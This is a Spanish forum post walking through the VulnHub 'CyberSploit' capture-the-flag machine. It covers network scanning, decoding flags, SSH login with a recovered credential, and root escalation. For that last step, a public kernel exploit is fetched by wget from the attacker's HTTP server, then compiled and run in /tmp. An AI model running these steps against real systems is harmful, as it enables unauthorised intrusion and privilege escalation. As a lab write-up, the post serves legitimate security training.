• Inicio
  • Buscar
  • Ingresar
  • Registrarse

    Starfield: el juego que revolucionará el espacio y la tecnología

    • Hack x Crack - Comunidad de Seguridad informática »
    • Seguridad Informatica »
    • Wargames »
    • Retos no oficiales »
    • CTF - CyberSploit [RESUELTO]
    • Imprimir
    Páginas: [1]   Ir Abajo

    Autor Tema: CTF - CyberSploit [RESUELTO]  (Leído 5709 veces)

    Desconectado R3LI4NT

    • { L4 } Geek
    • ****
    • Mensajes: 386
    • El poder del usuario radica en su ANONIMATO.
      • Ver Perfil
      • GitHub
    CTF - CyberSploit [RESUELTO]
    « en: Junio 19, 2022, 01:32:59 am »


    Nombre de la máquina: CyberSploit
    O.S: Linux (Ubuntu)
    Nivel: Fácil
    Reto compartido en mi perfil de Github: https://github.com/R3LI4NT/ctf-retos
    Descargar desde vulnhub:  https://www.vulnhub.com/entry/cybersploit-1,506/



    PASO 1): Identificar la IP de la máquina host con NetDiscover.
    Código: Text
    1. netdiscover -i wlan0 -r 192.168.1/24
    2.  



    IP host: 192.168.1.5

    PASO 2): Escanear todos los puertos que estén abiertos con Nmap.
    Código: Text
    1. nmap -p- --open -sC -n -vvv 192.168.1.5
    2.  



    Puertos abiertos: [22,80]

    PASO 3): Detección de servicios y sistema operativo.
    Código: Text
    1. nmap -p 22,80 -A 192.168.1.5
    2.  



    Servidor corriendo: HTTP Apache



    PASO 4): Enumerar archivos web con Dirb.
    Código: Text
    1. dirb http://192.168.1.5 -w /usr/share/dirb/wordlists/common.txt
    2.  



    Archivo: robots.txt
    Mostrar contenido del archivo con Curl:
    Código: Text
    1. curl http://192.168.1.5/robots.txt
    2.  



    Mensaje ofuscado a base64: R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

    Decodificar mensaje con Bash:
    Código: Text
    1. echo 'R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9' | base64 --decode
    2.  



    PASO 5): Conectarse al servidor SSH.

    CREDENCIALES SSH
    Usuario: itsskv
    Contraseña (FLAG_1): cybersploit{youtube.com/c/cybersploit}

    Código: Text
    1. ssh [email protected]
    2.  



    Capturar la segunda flag:
    Código: Text
    1. cat /home/itsskv/flag2.txt
    2.  



    Flag ofuscada a código binario:
    Código: Text
    1. 01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
    2.  

    PASO 6): Decodificar binario.

    ONLINE: https://www.online-toolz.com/langs/es/tool-es-text-binary-convertor.html



    FLAG_2: cybersploit{https:t.me/cybersploit1}

    PASO 7): Escalar privilegios: buscar exploit con Searchsploit.



    Versión del kernel: 3.13.0-32
    Código: Text
    1. searchsploit 3.13.0
    2.  



    Descargar exploit:
    Código: Text
    1. searchsploit -m 37292
    2.  



    Abrir un servidor local en el puerto 80 con Python3:
    Código: Text
    1. python3 -m http.server 80
    2.  



    Descargar exploit en el directorio /tmp; compilar y dar permisos de escritrura, lectura y ejecucción:
    Código: Text
    1. cd /tmp
    2. wget http://192.168.1.9/37292.c
    3. gcc 37292.c -o kernel
    4. chmod 777 kernel
    5.  



    Por último, explotar el kernel ./kernel y capturar la key (flag) del fichero finalflag.txt dentro del directorio /root:
    Código: Text
    1. ./kernel
    2. cd /root
    3. cat finalflag.txt
    4.  



    FLAG_3: cybersploit{Z3X21CW42C4 many many congratulations !}

    #R3LI4NT
    En línea

    No contesto dudas por MP, si las tienes, las planteas en el foro.

    Road To Hacking v3: https://github.com/R3LI4NT/road-to-hacking

    • Imprimir
    Páginas: [1]   Ir Arriba
    • Hack x Crack - Comunidad de Seguridad informática »
    • Seguridad Informatica »
    • Wargames »
    • Retos no oficiales »
    • CTF - CyberSploit [RESUELTO]
     

    • SMF | SMF © 2013, Simple Machines
    • XHTML
    • RSS
    • WAP2
    Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso... Learn more